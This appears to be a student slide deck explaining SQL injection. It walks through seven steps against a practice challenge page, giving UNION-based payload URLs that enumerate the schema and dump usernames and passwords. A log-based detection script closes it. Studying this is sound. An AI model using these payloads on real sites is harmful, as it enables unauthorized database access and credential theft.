This document summarizes the steps to perform a SQL injection attack on a vulnerable website. It begins by finding a dynamic page that interacts with a database, then determines the number of columns and vulnerable columns. Next, it checks the MySQL version number and retrieves table names from the information schema. Finally, it retrieves column names and extracts data from columns by concatenating values with delimiters. The attack was performed on http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 in 7 steps to demonstrate a SQL injection technique.
2. Cyber security
Cyber security is the practice of protecting systems,
networks, and programs from digital attacks. These
attacks are usually aimed at accessing, changing, or
destroying sensitive information; extorting money
from users; or interrupting normal business
processes.
Cyber security is the protection of internet-connected
systems, including hardware, software and data, from
cyber-attacks.
3. Why is cyber security important?
In today’s connected world, everyone benefits from advanced cyber
defense programs. At an individual level, a cyber security attack can result
in everything from identity theft, to extortion attempts, to the loss of
important data like family photos. Everyone relies on critical infrastructure
like power plants, hospitals, and financial service companies. Securing
these and other organizations is essential to keeping our society
functioning.
Everyone also benefits from the work of cyber threat researchers, like the
team of 250 threat researchers at Talos, who investigate new and emerging
threats and cyber attack strategies. They reveal new vulnerabilities,
educate the public on the importance of cyber security, and strengthen
open source tools. Their work makes the Internet safer for everyone.
4. There are many types of attacks:
Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks.
Man-in-the-middle (MitM) attack.
Phishing and spear phishing attacks.
Drive-by attack.
Password attack.
SQL injection attack.
Cross-site scripting (XSS) attack.
Eavesdropping attack.
I performed only one attack: SQL injection attack
5. A SQL injection is a technique used to exploit a website by altering
backend SQL statements through manipulating application input. SQL
injection occurs when a web application accepts user input and
places it directly into a SQL statement without filtering out
dangerous characters.
An attacker can use SQL injection to bypass authentication.
7. The website is hacked in seven steps.
The target website:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
STEP 1: The first step is to find a dynamic page, meaning one that
interacts with the database.
Generally these types of pages end with id=(some number), like
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
8. STEP 2: Finding the number of columns.
Now we check the number of columns. We can do this by removing the
single quote (') at the end and adding this to the end of the link:
order by number
9. STEP 3: Gathering vulnerable columns.
Now we have to find the columns which are vulnerable. To do that, enter
UNION SELECT 1,2,3,4 after the id parameter. Vulnerable here means those
columns which are interacting with that specific page. So when we inject
this command, it will select those columns which are interacting. In this
case 2 number columns are vulnerable.
10. STEP 4: Checking the MySQL version number.
As there are different ways to proceed for different MySQL versions, it is
important to determine the version. To do this, replace the vulnerable
column number with version() or @@version.
Example: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
UNION SELECT 1,2,3,version(). In this case the version number is 5.6.39. If the
version number is > 5, it is easy to retrieve information because of the information schema.
Similarly, we can find out the database name using the function
database(). There are many functions like version(), database(), now().
11. STEP 5: Retrieving table names.
Choose a vulnerable column and replace it with
group_concat(table_name,0x0a), followed by from
information_schema.tables where table_schema=database()--+
The URL therefore becomes
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 UNION
SELECT 1,2,3,group_concat(table_name,0x0a) from information_schema.tables
where table_schema=database()--+
12. STEP 6: Retrieving column names.
Replace table(s) with column(s) throughout, except in the last part,
where table_schema=database()--+ is replaced with
table_name=CHAR(117,115,101,114,115)--+
So the final URL becomes
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 UNION
SELECT 1,2,3,group_concat(column_name,0x0a) from
information_schema.columns where table_name=
CHAR(117,115,101,114,115)--+
13. STEP 7: Extracting data from columns.
So the final URL for extracting data is
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 UNION
SELECT 1,2,3,group_concat(id,0x3a,username,0x3a,password,0x0a)
from users--+
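The seven steps above leave a recognisable sequence in a web server's access log. The following is an added example, not part of the original slides: it decodes each request's query string and labels which stage of the walkthrough it matches, grouped by client. The stage names, regular expressions, log format and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One signature per stage of the walkthrough, most specific first.
SIGNATURES = [
    ("schema_enumeration", re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b")),
    ("data_extraction", re.compile(r"\bunion\b.*\bselect\b.*\bgroup_concat\s*\(.*\bfrom\b")),
    ("fingerprint", re.compile(r"@@version|\b(version|database)\s*\(")),
    ("union_probe", re.compile(r"\bunion\b.*\bselect\b")),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+")),
]
# Client address and request target from a common-log-format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the stage name a decoded parameter value matches, or None."""
    text = re.sub(r"\s+", " ", value.lower())
    for stage, pattern in SIGNATURES:
        if pattern.search(text):
            return stage
    return None

def stages_by_client(log_lines):
    """Map each client address to the ordered list of stages it triggered."""
    seen = {}
    for line in log_lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qsl percent-decodes values and turns '+' into a space.
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            stage = classify(value)
            if stage:
                seen.setdefault(client, []).append(stage)
    return seen

# Constructed sample input: documentation-range addresses, made-up timestamps.
def _line(client, query):
    return f'{client} - - [01/Jan/2024:10:00:00 +0000] "GET /sqlninja.com/tasks/basic_ch1.php?{query} HTTP/1.1" 200 512'

SAMPLE_LOG = [
    _line("198.51.100.9", "id=1"),
    _line("203.0.113.7", "id=1%20order%20by%205--+"),
    _line("203.0.113.7", "id=1%20UNION%20SELECT%201,2,3,4--+"),
    _line("203.0.113.7", "id=1%20UNION%20SELECT%201,2,3,version()--+"),
    _line("203.0.113.7", "id=1%20UNION%20SELECT%201,2,3,group_concat(table_name,0x0a)%20from%20information_schema.tables%20where%20table_schema=database()--+"),
    _line("203.0.113.7", "id=1%20UNION%20SELECT%201,2,3,group_concat(id,0x3a,username,0x3a,password,0x0a)%20from%20users--+"),
]
print(stages_by_client(SAMPLE_LOG))
```

A single client moving from column_count_probe through to data_extraction on a numeric parameter is a much stronger signal than any one match alone, and the underlying fix remains binding id as a query parameter rather than concatenating it into the statement.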